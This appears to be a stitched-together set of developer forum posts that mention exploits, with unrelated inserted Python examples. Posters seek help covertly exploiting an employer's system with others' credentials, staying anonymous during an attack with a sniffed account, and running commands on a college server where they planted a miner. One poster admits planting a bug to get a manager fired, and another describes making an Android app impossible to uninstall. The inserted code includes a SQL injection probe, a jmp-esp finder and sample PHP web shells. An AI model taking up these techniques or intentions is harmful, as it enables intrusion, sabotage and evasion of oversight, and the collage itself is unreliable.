The tricky part is that I have to stay hidden and I only have my own credentials for logging in to the ASP page. (Uploading a script is almost ruled out because it will reveal my identity.)
Also I have access to the local network with some of the other employees' user/pass.
Any recommendation for exploiting and staying hidden at the same time?
One more question: will exploits for newer versions necessarily work for the older ones?
Android flaw I've found (fixed in Android 8, working on 7.1.1):
To make an app uninstallable by the normal user, make the app a device administrator, add "android.permission.SYSTEM_ALERT_WINDOW" to the manifest and make sure it's not granted by the user.
Now when you try to uninstall the app, it tells you to disable it from device administrators, but the device administrator disable dialog is a System Window handled by the app itself, and if the app has this permission but it is not granted, Settings will crash with a SecurityException, leaving the app untouched.
I spent the last 5 hours solving this FUCKING GREAT challenge and I'm finally done 🎉
It's hxp CTF btw, check it out
I wish I had remembered this when the weekly theme was office pranks.
In the first or second year of high school we covered basic internet security. Stuff like don't follow suspicious urls, don't open suspicious emails and such.
Our teacher let us play around with some sort of simulated desktop environment, where we could execute some hacks like ad popups and such on each other's environment, if we fell for the trap.
Anyway, one hack I found interesting was one that locks a user out of their virtual desktop until they enter a password that is displayed on their environment.
Yes, a very interesting hack, because it contains two obvious yet major design flaws, which I could exploit 😈
1. It's case sensitive
In itself not a problem, but combined with #2, it's fatal.
Depending on your font, you probably have no idea what exactly I just typed.
Let's just say, in the font displayed, uppercase i and lowercase L were completely indistinguishable.
Guess whom I let suffer.
It was our teacher, who had to demonstrate some things to us and who was connected to the same network.
I swear, nothing beats that feeling when your teacher has to come to you and embarrassingly ask you to "unhack" them, because they can't type it 😂
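An added example prompted by the story above (not the poster's code and not the classroom tool): the two flaws combine because a case-sensitive code is shown in a font where several glyphs are look-alikes. The block below detects look-alike characters in a displayed code, enumerates how many different strings a user could plausibly read off the screen, and generates codes from an alphabet that avoids the problem. The confusable groups are a common but assumed set; the function names are made up for this example.

```python
import itertools
import secrets
import string

# Glyphs that look alike in many UI fonts (assumed set). A user reading a
# code off the screen may not be able to tell members of one group apart.
CONFUSABLE_GROUPS = ["Il1|", "O0", "S5", "Z2", "B8"]
GROUP_OF = {c: g for g in CONFUSABLE_GROUPS for c in g}


def confusable_chars(code):
    """Return the characters of `code` that belong to a look-alike group."""
    return [c for c in code if c in GROUP_OF]


def is_unambiguous(code):
    """True if nothing in `code` can be misread as another character."""
    return not confusable_chars(code)


def possible_readings(code):
    """Every string a user might plausibly type after reading `code`.

    Each confusable position expands to its whole group, so the count is the
    product of the group sizes: "Il" yields 4 * 4 = 16 candidates, and a
    case-sensitive check accepts exactly one of them.
    """
    choices = [GROUP_OF.get(c, c) for c in code]
    return ["".join(p) for p in itertools.product(*choices)]


# Letters and digits with every confusable glyph removed.
SAFE_ALPHABET = "".join(
    c for c in string.ascii_letters + string.digits if c not in GROUP_OF
)


def generate_code(length=8):
    """Generate an unlock code that avoids look-alike characters entirely,
    so case sensitivity stops being a trap. Uses a CSPRNG."""
    return "".join(secrets.choice(SAFE_ALPHABET) for _ in range(length))
```

Dropping the confusable glyphs costs a few bits of entropy per character, which a slightly longer code recovers; loosening the comparison instead (accepting any reading) would widen what the lock accepts and is the worse fix.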
1. It's gonna be more and more specialized - to the point where we'll equal or even outdo the medical profession. Even today, you can put 100 techs/devs into a room and not find two doing the same job - that number will rise with the advent of even more new fields, languages and frameworks.
2. As most end users enjoy ignoring all security instructions, software and hardware will be locked down. This will be the disadvantage of developers, makers and hackers equally. The importance of social engineering means the platform development will focus on protecting the users from themselves, locking out legitimate tinkerers in the process.
3. With the EU getting into the backdoor game with eTLS (only 20 years after everyone else realized it's shit), informational security will reach an all-time low as criminals exploit the vulnerabilities that the standard will certainly have.
4. While good old-fashioned police work still applies to the internet, people will accept more and more mass surveillance as the voices of reason will be silenced. Devs will probably hear more and more about implementing these or joining the resistance.
5. We'll see major leaks, both as a consequence of mass-surveillance (done incompetently and thus, insecurely) and as activist retaliation.
6. As the political correctness morons continue invading our communities and projects, productivity will drop. A small group of more assertive devs will form - not pretty or presentable, but they - we - get shit done for the rest.
7. With IT becoming more and more public, pseudo-knowledge, FUD and sales bullshit will take over and, much like we're already seeing it in the financial sector, drown out any attempt of useful education. There will be a new silver-bullet, it will be useless. Like the rest. Stick to brass (as in IDS/IPS, Firewall, AV, Education), less expensive and more effective.
8. With the internet becoming a part of the real life without most people realizing it and/or acting accordingly, security issues will have more financial damages and potentially lethal consequences. We've already seen insulin pumps being hacked remotely and pacemakers' firmware being replaced without proper authentication. This will reach other areas.
9. After marijuana is legalized, dev productivity will either plummet or skyrocket. Or be entirely unaffected. Who cares, I'll roll the next one.
10. There will be new JS frameworks. The world will turn, it will rain.
If I exploit MS Server 2012 through a wifi hotspot, but logged in to someone else's account (assume it was sniffed), and I do it using msfconsole connected to Tor with the torify command, and I also spoof my MAC,
will I stay 100% anonymous?
If not, what can be done?
I've been interested in security for years, but despite knowing the theory I've always had this disconnect with actually doing it. About two years ago I finally managed to find and exploit my first cross-site scripting vulnerability in my company's product whilst doing some routine acceptance testing. It was a penny-drop moment for me which has led to some very interesting projects, and it was pretty badass.
Widget "hack" in secondary.
When I was around 13 or 14 I was enrolled at a public school in the UK. In an effort to try to be eco-friendly, the students and an IT technician teamed up to try and create a widget that would track the consumption of printer credit used by all users (staff and students).
At first, I was just playing around with the homepage source code but eventually noticed the widget had separate code within the page.
Because all of the computers were interconnected, I grabbed the source code of the home page and put it into a notepad editor.
I used the intranet to look up staff names and student login usernames. I replaced my user ID with several staff members.
Boom, I could see how much paper they had used, how much they owed the library etc. May not be as impressive as others' exploits, but some staff were in debt by hundreds and never paid back a penny.
Hope you liked my story.
Ideal dev job would be teaching kids code. Probably a side-gig at a local school.
Main gig would be writing code to exploit the "push to prod" Internet of Things things. Security on that is garbage. 🚮
Malware is a nasty kind of application that can spy on you, use your computer as an attacker or encrypt your files and hold them for ransom.
The reason that malware exists is because of how the file system works. On Windows, everything can access everything. Of course, there are security measures, like needing administrator permissions to edit/delete a file, but they are exploitable.
If the malware is not using an exploit, there is nothing to stop a user from unknowingly clicking the yes button when an application requests admin rights.
If we want to stop viruses in the first place, we need to create a new file-sharing system.
Imagine that every app has a partition, and only that app can access it.
Currently, when you download a Word document, you would go ahead, start up Word, go into the Downloads folder and open the file.
In the new file-sharing system, you would click "Send file to Word" in your browser, and the browser would create a copy of the file in a transfer partition. Then it would signal to Word, saying "Hey! Here's a file that I sent to you, copy it to your partition please!". After that, Word just copies the file to its own partition, signals "Ok! I'm done!", and then the browser deletes the file from the shared partition.
A little change in the interface, but a huge change in security.
The permission system would be a better UAC. The best way I can describe it is like when you install an app on Android: it shows what permissions the app wants, and you can choose to install it or not.
Replace "install" with "grant" and that's what I imagined.
Of course, there would be blacklisted permissions that only kernel-level processes have access to, like accessing all of the partitions, modifying applications, etc.
What do you think?
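An added example, not code from the rant above: a user-space model of the per-app partition plus transfer area that the post describes. Each app gets its own directory, a path check refuses anything that escapes it, and "Send file to Word" goes through the broker's transfer area so neither app ever opens the other's partition. Real enforcement would have to live in the kernel; this only shows the mediation logic. The class and function names are invented for this example and the file content is constructed.

```python
import os
import shutil
import tempfile


class SandboxFS:
    """Model of the proposal: one private partition (directory) per app,
    a broker-owned transfer area, and hand-offs that copy through it."""

    def __init__(self, root):
        self.root = root
        self.transfer = os.path.join(root, "_transfer")
        os.makedirs(self.transfer)
        self.apps = {}

    def register(self, app):
        """Create the app's private partition."""
        path = os.path.join(self.root, app)
        os.makedirs(path)
        self.apps[app] = path

    def _own(self, app, name):
        """Resolve `name` inside the app's partition and refuse anything that
        escapes it (a '..' component is the obvious way an app would try)."""
        base = self.apps[app]
        path = os.path.normpath(os.path.join(base, name))
        if not path.startswith(base + os.sep):
            raise PermissionError(f"{app} may not access {path}")
        return path

    def write(self, app, name, data):
        with open(self._own(app, name), "wb") as f:
            f.write(data)

    def read(self, app, name):
        with open(self._own(app, name), "rb") as f:
            return f.read()

    def send(self, src_app, name, dst_app):
        """'Send file to Word': stage a copy in the transfer area, copy it into
        the receiver's partition, then remove the staged copy."""
        leaf = os.path.basename(name)
        staged = os.path.join(self.transfer, leaf)
        shutil.copyfile(self._own(src_app, name), staged)
        try:
            shutil.copyfile(staged, self._own(dst_app, leaf))
        finally:
            os.remove(staged)
        return self.read(dst_app, leaf)


def run_demo():
    """Walk through the browser -> Word hand-off with constructed data."""
    with tempfile.TemporaryDirectory() as root:
        fs = SandboxFS(root)
        fs.register("browser")
        fs.register("word")
        data = b"example document bytes"  # constructed sample content
        fs.write("browser", "report.docx", data)
        received = fs.send("browser", "report.docx", "word")
        try:
            fs.read("word", "../browser/report.docx")  # Word peeking at the browser
            traversal_blocked = False
        except PermissionError:
            traversal_blocked = True
        return {
            "received": received,
            "transfer_leftovers": os.listdir(fs.transfer),
            "traversal_blocked": traversal_blocked,
            "still_in_browser": fs.read("browser", "report.docx") == data,
        }
```

The interesting property is that the receiver gets a copy, not a handle into the sender's space, and the transfer area is empty again once the hand-off completes.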
One of two ways.
1. A lot of open-source companies will start up, hiring developers based on what contributions they provide
2. The current companies will fire most of the devs to exploit free work from open-source devs, offering pennies as bug bounties while only keeping very few maintainers.
Pentesting for undisclosed company. Let's call them X as to not get us into trouble.
We are students and are doing our first pentest at an actual company instead of assignments at school. So we're very anxious. But today was a good day.
We found some servers with open ports so we checked a few of them out. I had a set of them with a bunch of open ports like ftp and... 8080. Time to check this out.
"please install flash player"... Security risk 1 found!
System seemed to be some monitoring system. Trying to log in using admin admin... Fucking works. Group loses it cause the company was being all high and mighty about being secure af. Other shit is pretty tight though.
Able to see logs, change password, add new superuser, do some searches for USERS_LOGGEDIN_TODAY! I shit you not, the system even had SUGGESTIONS for usernames to search for. One of which had something to do with sftp and auth keys. Unfortunately every search gave a SQL syntax error. Used sniffing tools to maybe intercept the message so we could do some queries of our own, but nothing. The query is probably not issued from the local machine.
Tried to decompile the flash file but no luck. Only for some weird lines and a few function names I presume. But decompressing it and opening it in a text editor allowed me to see and search text. No GET or POST found. No SQL queries or name checks or anything we could think of.
That's all I could do for today. So we'll have to think of stuff for next week. We've already planned xss so maybe we can do that on this server as well.
We also found some older network printers with open telnet. Servers with a specific SQL variant with a potential exploit to execute terminal commands, and some FTP and SMB servers we need to check out next week.
Hella excited about this!
If you guys have any suggestions let us know. We are utter noobs when it comes to this.
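An added example, not the students' code and not the client's system: a search that answers every input with a SQL syntax error is the classic sign that the term is pasted straight into the statement. The block builds a tiny in-memory table with constructed names, shows the concatenated query failing on a lone quote and returning every row for a `' OR '1'='1` term, and puts the parameterized version next to it. Assumes sqlite3 (bundled with Python); table and names are made up.

```python
import sqlite3


def make_db():
    """In-memory stand-in for a monitoring system's user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, last_login TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [
        ("alice", "2019-05-10"),
        ("bob", "2019-05-11"),
        ("sftp_backup", "2019-05-11"),
    ])
    return conn


def search_vulnerable(conn, term):
    """The search term is spliced into the SQL text, so a quote in the input
    rewrites the statement instead of being searched for."""
    sql = "SELECT name FROM users WHERE name LIKE '%" + term + "%' ORDER BY name"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term):
    """Same search with a bound parameter: the term is data, never SQL."""
    sql = "SELECT name FROM users WHERE name LIKE ? ORDER BY name"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def probe(conn, term):
    """What a tester sees from outside: either rows, or the syntax error the
    application leaks when the spliced statement no longer parses."""
    try:
        return search_vulnerable(conn, term)
    except sqlite3.OperationalError:
        return "syntax-error"
```

On an engagement, confirming the behaviour with a single quote and a tautology like the one above is enough to report it; pulling data beyond that should stay inside what the client authorized.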
mods are asleep.
all aboard the ++ train
++ all the comments in the thread. once you reach the end, post a comment. only post one comment. board the train.
10K bump but salary is probably still below market for the skills I have... Most likely reason? Trump tax cuts...
I can't showcase my skills in interviews assuming I get any... Not motivated in cramming or studying those useless algorithm questions that have little correlation to actual work.
Whatever.... job pays the bills pretty well... Sorta boring as I'm like the biggest fish on the whole team but that's also the upside I guess... May not be true but I think I'm pretty hard to fire...
So now it's sorta 20% work 80% life... So guess I'm done exploring and just gonna exploit...
P.S. I wore this while taking a break from solo karaoking.... (Thursday night)
Got started by making farmville cheats. Found many exploits. Best was when I found 3 ways to do the same exploit. Zynga kept patching and I kept releasing a new way.
Lasted for just over a year or so.
Played for like 3 years and then got bored. Those were the golden days, really miss them.
I fucking hate it when professional rivalry affects the students. I am a student, and for some unknown fucking reason there is some kind of professional rivalry at the higher ends of my college. The effect of this is unwanted criticism and loads of pressure on us, the students, to outperform the students belonging to the other side (of the rivalry). What the fuck.
If you are in such a field, make sure that your rivalry with someone else does not affect the ones who seek knowledge and learning. It is not right to harass and exploit people who respect you and come to you for learning. It not only affects you but also a whole lot of people who look forward to some kind of professional behaviour from you. Keep rivalry away from students. Work for what is necessary and get things done. It is as simple as that.
I read this rant on Quora. Is this true ?
“The IT industry has devolved into a gigantic ponzi scam built on exploitation and BS. Quality of solution and quality of work was replaced with a ‘Does it work now?’ approach with zero contingency.
And the fact that geeks and nerds are naive only helps the white collar crooks to exploit them as code monkeys.”
*News for the users here that deal with web hosting here*
Hey there, anyone that vaguely remembers me: I've been busy with my network lately and don't have much time to get back here. I don't know if someone has already reported this news; I found it while I was scouting for news to share on my site (shameless plug: https://legionfront.me/pages/news)
It's about our beloved /s and highly used WordPress and its lovely code /s
Long story short, there is an exploit (one of many) to DDoS a network of WordPress sites that has been present since almost literally forever; the code to fix it is in the article
I am learning exploit development on Windows and I have a problem with it when I analyze the registers ESP and EIP.
I am able to overwrite both ESP and EIP.
The problem is that I cannot make use of "mona.py". "mona.py" keeps showing me that there are no pointers in any OS DLLs, whereas that is not true.
Immunity Debugger is working completely fine.
I need "mona.py" to find pointers to ESP, but it says there are none.
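An added example (not the poster's code and not mona.py) of what "find pointers to ESP" means: scan a byte image for the instruction sequences that transfer control to the stack pointer (`jmp esp`, `call esp`, `push esp; ret`), turn each hit into the 4-byte little-endian value that would overwrite EIP, and drop candidates whose encoding contains a bad character. The input is a constructed byte blob treated as a flat image loaded at an assumed base; for a real DLL on disk the file offset must be mapped to the in-memory address through the PE section table, which is the part mona does for you and this example does not.

```python
import struct

# Byte sequences that transfer control to whatever ESP points at. Any one of
# them at a fixed (non-ASLR, non-rebased) address is a usable EIP overwrite.
STACK_PIVOTS = {
    b"\xff\xe4": "jmp esp",
    b"\xff\xd4": "call esp",
    b"\x54\xc3": "push esp; ret",
}


def find_stack_pivots(blob):
    """Return sorted (offset, mnemonic) pairs for every pivot in `blob`."""
    hits = []
    for pattern, name in STACK_PIVOTS.items():
        start = 0
        while True:
            idx = blob.find(pattern, start)
            if idx == -1:
                break
            hits.append((idx, name))
            start = idx + 1
    return sorted(hits)


def little_endian(addr):
    """The 4 bytes that land in EIP for a 32-bit address."""
    return struct.pack("<I", addr)


def usable_pivots(blob, base, bad_chars=b"\x00\x0a\x0d"):
    """Translate offsets to absolute addresses, assuming `blob` is a flat
    image loaded at `base`, and drop any whose encoding contains a bad char
    (NUL, LF and CR are assumed bad here; the real list depends on the bug)."""
    result = []
    for offset, name in find_stack_pivots(blob):
        addr = base + offset
        if not set(little_endian(addr)) & set(bad_chars):
            result.append((addr, name))
    return result


# Constructed sample "module": NOP sled, a jmp esp, padding, a push esp; ret.
SAMPLE = b"\x90" * 16 + b"\xff\xe4" + b"\xcc" * 7 + b"\x54\xc3" + b"\x00" * 5
```

With the sample loaded at an assumed base of 0x10000000 every candidate encodes a NUL byte and is rejected; at 0x7C801000 both survive. That is the same filtering mona applies when it reports "no pointers": a module can contain `jmp esp` and still yield nothing usable once bad characters and rebasing are taken into account.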
Most of my private code is created in the evening hours and after one to two beers, so I got that covered pretty well - though if you want to see what happens if you code literally shitfaced, just go play Mafia 3. That deterred me from trying.
The one thing I did at a party was fix a computer after (I think) 4 beers. Apparently I got it together because the sounds worked after that, but don't ask me how. Besides, it had OSX, I usually avoid that thing like the plague. I guess getting drunk means I can handle even that shit.
1-2 Beers is the max I still can code (or properly think) with. Any more and I can't get a single line out.
Worst thing I tried was coding high. I was on a short trip to Amsterdam and a friend of mine brought on some White Widow...
Yeah, I could focus alright... The code worked and the program was done in two hours (It was an exploit for... well, lets not get into details here).
When I reread the code while not high anymore, it might as well have been binary (it was Python). I could, for the life of me, not figure out what the hell I had been writing there or how/why it worked - but it did its job.
Never again. I mean, WW is my favourite and I hear a lot of artists use it to enhance their "flow" when creating art...
I guess it makes sense to code on that, but I generally try to avoid flow when coding - it makes you produce unreadable and unmaintainable code.
LinkedIn: Exploiting social psychology for fun and profit.
I was reading an excellent post by Kage about linkedin (you can find it and more here - https://devrant.com/users/Kage) a little while ago and it occurred to me the unique historic moment we are in. Never before have we been so connected in history. Never before have we had so great an opportunity to communicate with strangers (perhaps except for sketchy candy vans on college campuses, and tie dye wearing guys distributing slips of paper at concerts). And yet today, we are more atomized than ever before. In this unprecedented era of free information, and free communication, how can we make the most of our opportunities?
The great thing about linkedin is all the fawning morons who self select for it. They're on it. They're active, so you know they're either desperate attention hungry cock goblins,
self-aggrandizing dicknosed cretins, desperate yeasty little strumpets, or a menagerie of other forgettable fucking pawns,
willingly posting up their entire lives to be harvested and sold so someone can make 15 cents on a 2% higher ad conversion ratio for fucking cilas or beetus meds.
So what is a psychopathic autist asshole to do?
Ruthlessly exploit them by feeding them upvotes, hows-it-going-guys, and other little jolts of virtualized feel-good-chemical bullshit.
Remember the quickest way to network is for people to like you. And the quickest way to make people like you is either agree with them on everything, or be absolutely upfront with everything you disagree on.
Well, they'll love you, or hate you. But at least you'll be living rent-free in their head. And that means they'll remember you when you call looking to network or get a referral.
Of course, in principle, this extends to any social media site. Why not facebook? Why not fucking *myspace*? Why not write a script in selenium to browse twitter all day, liking pictures of lattes and dogs posted by the lonely and social-approval-hungry devs working at places like google, twitter, faceborg, etc?
You could even extend this to non-job prospects. Want a quick fuck? Why, just script a swipe-right hack on Tinder, or attach a big motherfucking robot arm to your phone, tapping and swiping for hours. Want to make a buck? Why not harvest data on eBay or Amazon all god damn day and then run arbitrage for 'wanted' classifieds on Craigslist?
Why not automate all the things?
The world is at your fingertips, and you have the power to automate it, while all the wall lickers and finger painters live oblivious to the opportunity they are surrounded with and blessed with daily.
Surely now that you know, it is your obligation, nay, your DUTY to show the way.
Now you are learned. Now you are prepared. Go forth and stroke the egos of disposable morons to bilk for future social favors while automating the world in ways never intended.
ARE YOU FUCKING KIDDING ME!!!!!
IT'S A FUCKING VPN AND THEY CAN'T FUCKING PROTECT IT'S CONFIG FILES FROM JS!!!!!
ooh first rant with Dvorak
My best friend's ex is really cool. But while they were dating, I was a bit frustrated, mainly because he was interested in many things she wasn't.
One thing that annoyed me was that his major is computer science, and her major is medical research.
GIRL, IF ONLY YOU WERE ALSO MAJORING IN COMPUTERS. YOU CAN ASK THE GUY FOR HELP WITH YOUR ASSIGNMENTS. EXPLOIT HIIIIM. HAVE COFFEE DATES AT STARBUCKS AND CODE TOGETHEEER. HIT TWO BIRDS WITH ONE STONE
!rant Scary Stuff...
Not sure what are the rules on sharing external content, but this story freaked me out and I wanted to share with you.
Pretty scary stuff, maybe something like this is already in the wild? Especially with the NSA and other power groups trying to exploit vulnerabilities and infiltrate everything...
Found it originally on the rational subreddit. Here is the link:
It's about the Ken Thompson Hack:
"Ken describes how he injected a virus into a compiler. Not only did his compiler know it was compiling the login function and inject a backdoor, but it also knew when it was compiling itself and injected the backdoor generator into the compiler it was creating. The source code for the compiler thereafter contains no evidence of either virus."
How to detect/deal with something like this? Better not to think too much about this.
Exploit development is a really great topic.
The best decision I have made so far.
I tried to do that sort of thing 8-10 years ago, but that was the script kiddie me... On top of that, my attention span was very low. That shows the state of my low willpower.
You really got to hang in there to go further.
Without extreme will power, you simply won't make it. You will become very frustrated. That's normal. Just never give up on it. Keep retrying. In the end it pays out.
It has a steep learning curve, but in the end you learn so many fricking things.
People going crazy over the new Intel CPU exploit. I'm just sipping coffee looking at my AMD CPU that's never done me wrong 🙌
My Project Lead got me to work overtime, I was doing 150% of what I was supposed to do.
After 4 months of tremendous work and smart planning, I planted a small bug in the software we build and used that to exploit the software yesterday morning, and today by 3 PM (our usual lunch time) he was fired.
Finally, that donkey is fired and now he must rot in hell; yeah, he got that stamp on his resume for being fired.
Now I am feeling guilty that I have almost ruined his career (30%), but I am happy that rascal got what he deserved (70%). Yay!
So I get three wishes, right? Great! I wish I lose 3 wishes.
By that logic I start at three, minus one for the wish, and then proceed to lose another three, leaving me at -1. So by our logic, we'd be back at 3 due to underflow.
To exploit this, make one genuine wish and then ask to lose two wishes, underflowing again.
It’s all in how you play the game.
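An added example that plays the joke above through as an unsigned counter (not the poster's code): with the count kept in two bits, 3 - 4 wraps to 3, exactly the underflow the post describes, and the "one genuine wish, then lose two" strategy works again for the same reason. The checked variant beside it is the fix a reviewer would ask for in real code: refuse a subtraction that would go below zero instead of letting it wrap. Class and function names are invented for this example.

```python
class WishCounter:
    """Wishes kept in an unsigned counter `bits` wide. Subtraction wraps
    modulo 2**bits, like unchecked unsigned arithmetic in C."""

    def __init__(self, bits=2, wishes=3):
        self.mod = 1 << bits
        self.wishes = wishes % self.mod

    def wish(self, cost=1):
        """Spend `cost` wishes: the wish itself plus whatever it asks to lose."""
        self.wishes = (self.wishes - cost) % self.mod  # wraps on underflow
        return self.wishes


class CheckedWishCounter(WishCounter):
    """The same counter with the bounds check the genie forgot."""

    def wish(self, cost=1):
        if cost > self.wishes:
            raise ValueError(f"cannot spend {cost} wishes, only {self.wishes} left")
        self.wishes -= cost
        return self.wishes


def play_post_strategy(counter):
    """One genuine wish, then 'I wish to lose two wishes' (costs 1 + 2 = 3)."""
    counter.wish(1)
    return counter.wish(3)


def strategy_refused(counter):
    """True if the counter rejects the underflow trick instead of wrapping."""
    try:
        play_post_strategy(counter)
    except ValueError:
        return True
    return False
```

The width only changes where the wrap lands: a 32-bit counter turns the same 3 - 4 into 4294967295 wishes, which is the shape most real-world underflow bugs take.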
Got bit by a hacked repo. It was compromised for all of like 30-some seconds. No intrusions, but now I can't set my root password (passwd goes "oh, yeah, we got this" then it does... nothing...) and Wayland/X/Gnome/Cinnamon/KDE/whatever the kids use nowadays are all busted (they all start, but they just hang tty1 and whatever other console invoked it). Tried reinstalling all those kinds of things, didn't help.
Some companies do not hold ethics. They believe that developers are easily available on the market and can be replaced any day.
These companies talk about serving notice periods for longer terms, and then, if they employ someone by then, the management supposedly finds flaws in you and asks you to leave before completing the service period.
When the developer agrees to leave, they realise the developer is currently developing a project for the benefit of the same company, then they push the relieving date out again. I mean, why can't they be certain about what they want?
These kinds of companies only know how to exploit and extract young developers' knowledge, and every developer should be aware of this type of people.
Also, evaluating and reviewing code cannot be done in a few seconds without anyone knowing the project, and especially by someone who holds the same experience as you, but in only one framework. So junior developers, before absorbing any feedback from any evaluator, please try to understand the person's background and knowledge in the field he is evaluating you in.
So, there was this time I was a security intern for Google. It was my first day as an intern tho :p and I got a little excited about exploring stuff and all at the workplace. Me having a large appetite, I was mesmerized by the food supplied over there.
I might have sat approximately 2 hours over there fantasizing about how much I could save on food by eating a lot over there and taking some home.
Then the SE/SDE guys came over to my place and we started discussing how there was a loophole here and how one could exploit it. All were head over heels about how I was making calculations for "my" property. All seemed to be pretty interested except for one guy. This guy was over-excited about how I was managing this and slacking off on the first day. He happened to be a senior lead architect; turns out he shows too much interest in anything he finds suspicious. This wasn't supposed to be a rant, but yeah. My story.
Trying to make something of myself without working for anyone else.
It used to be easy for me, but fear kept me from pursuing things all the way through when I was younger. I never wanted to leave what were decent jobs at the time.
I finally did it. Threw away a very good job to bet on myself.
But the difference is, now I have a family and finding free time in itself isn’t that hard, but finding free time to code uninterrupted for hours... the way one needs to in order to hold a program in ones mind... yeah, near impossible these days, haha.
I have great ideas but I need help to get things to that ‘next level’ where an idea could take off and get real investments. And I need money to pay the help... Just getting the ball rolling would be nice. I used to take it for granted how easily I could get side jobs and be literally the best in town. But now it’s insanely competitive. I don’t even consider web design an option for side work anymore, with sites like Wix and customers that don’t appreciate what I do vs a kid that gives them a WordPress theme for just the cost of dirt-cheap hosting... traditional web design is dead.
But that’s all well and good, I saw that coming over a decade ago and focused more on coding applications. I do think there’s a niche for my programming skills, so my current goal is trying to exploit that, or at least see if it’s viable. I just need something to get money to invest in my real projects.
I’d love to hear from people with similar situations! Not sure if I’ll pull it off before I have to go back to work. Although, I viewed never returning to the workforce haha. We’ll see...
Right now, everything. I started at a Consulting firm because I expected many new problems to tackle, solutions to develop and generally to always have a fire burning underneath my ass but instead I always develop the same standard bullshit.
I miss the days in my old job when there was just a problem and the task to solve it. When I stared down giant amounts of data, just KNOWING that somewhere in that mess was some structure I could exploit, and that short moment of inspiration when I finally pinpointed it. The rush of endorphins when the solution became clear and everything fell into place to form a beautiful pattern amidst the chaos of test data, git commits and numpy arrays.
Now its just "Yeah, would you just write another selenium testsuite that throws out fail or pass and wastes all the information because the only reason I'm a testmanager is because I'm too incompetent to do anything else and not my passion for the field".
The constant, mind-numbing repetition of always the same patterns, where the occasional dynamic element that becomes stale is the highlight of my work week... I would have never thought that making good money with easy work would ever get me as close to depression as it did.
What's up with those fucking internships? Is it a new way to exploit people and have someone do all the hard work that no one else wants to do but for free?
Oh and by the way, if your company is worth more than 10 million dollars and you still have unpaid internships FUCK YOU.
4200 PHP files with exploit code removed or cleaned and 12 hours of work, and I can cautiously sigh in relief
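An added example of the triage step behind a clean-up like the one above (not the poster's code, and not taken from their site): walk a tree of PHP files and flag the patterns that injected code almost always carries, such as `eval()` wrapped around a decoder, `preg_replace` with the `/e` modifier, and shell functions fed straight from request parameters. A hit is a reason to open the file, not proof of compromise, and a clean result is not proof of anything either; obfuscation beyond these patterns is common. The sample files are constructed for this example.

```python
import os
import re
import tempfile

# Heuristic signatures for injected PHP. Each is a (label, regex) pair.
SUSPICIOUS = [
    ("eval-decode", re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("preg-replace-e", re.compile(
        r"""preg_replace\s*\(\s*(['"])[^'"]*/[a-z]*e[a-z]*\1""", re.I)),
    ("request-exec", re.compile(
        r"\b(system|passthru|shell_exec|exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("dynamic-call", re.compile(
        r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I)),
]


def scan_source(text):
    """Return the labels of every suspicious pattern present in one file."""
    return [label for label, rx in SUSPICIOUS if rx.search(text)]


def scan_tree(root):
    """Walk `root`; return {relative path: [labels]} for every .php file with hits."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "r", encoding="utf-8", errors="replace") as f:
                found = scan_source(f.read())
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


# Constructed samples, not from any real site.
CLEAN = "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>"
INFECTED = "<?php @eval(base64_decode('aWYoaXNzZXQoJF9HRVRbJ2MnXSkpIHN5c3RlbSgkX0dFVFsnYyddKTs=')); ?>"
BACKDOOR = "<?php if (isset($_POST['cmd'])) { system($_POST['cmd']); } ?>"


def demo_scan():
    """Lay out a small constructed site tree in a temp dir and scan it."""
    files = {
        "index.php": CLEAN,
        "wp-content/uploads/x.php": INFECTED,
        "inc/shell.php": BACKDOOR,
        "notes.txt": BACKDOOR,  # not .php, so the scanner skips it
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, text in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as f:
                f.write(text)
        return {k.replace(os.sep, "/"): v for k, v in scan_tree(root).items()}
```

For a real incident the scan only narrows the list; the reliable way to find every modified file is to diff the tree against a known-good copy (the upstream release or a pre-compromise backup) and to review anything in upload directories that is executable at all.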
I would get a testing job and thus exploit weaknesses in the AI-created software.
After finding such weaknesses, I would write AI-debilitating viruses and WannaCry-like ransomware until I get my job back!
If that doesn't work out, I'd go into linguistics.
How to discover and exploit vulnerabilities in programs or IoT firmware? C++, asm, writing zero-days, I have always been amazed by that. Art.
I think it's safe to say I'm not a big (medium) fish in a small pond.
But now, thinking more and more, is it worth the time that I've already invested plus another unknown amount to try to become a little fish in a bigger pond...
I am new to c and cpp.
I used to exploit my college's competitive programming platform because it had a bad architecture and almost no auth checks.
For every AJAX request, they weren't sending auth tokens or any form of identification, and ran all the programs without any logs, on the main thread and as root... wtf, right?
But recently they've changed something on the site and I cannot run bash commands using the system() call.
Is there any other way to execute bash commands using C and C++?
I had already configured a miner on their server but then they re-deployed it because someone fork-bombed the shit out of it.
I'm a noob in C and C++ btw!
I need your advice about deciding whether to work as a freelancer for a startup or not.
So this French startup is couple years old and they decided to build a team in my country. I went to the interview few weeks ago and we discussed the projects, details, potential salary and everything seemed great.
A couple of days ago I received a service contract from them and now I need to decide whether to work for them or not.
Plan is for them to come to my country, rent an office and I should go there and work for them.
The salary that they offered is medium level and they will not have any legal entity in my country. However it’s not a problem for me since I have my own LTD company so I would pay salary on my own.
However there are some cons:
My team members are being hired as freelancers, however salary is defined with a daily rate instead of hourly and we are allowed to work maximum 20 days a month. It is not clear how many hours a week/month they will expect us to work and at this point I’m afraid to rock the boat with my questions. I understand that I shouldn’t receive any health insurance, sick leave pays, vacation days, home office, pension contributions and so on. But it’s so weird that they pay per day instead of per hour. It screams with unpaid overtime.
Payment time is 30 days after invoice has been sent. So If I started working from September 01, I will send them invoice at September 30, then I will work all October and will receive my money only around end of October. Working 60 days to receive my first salary doesn’t seem nice.
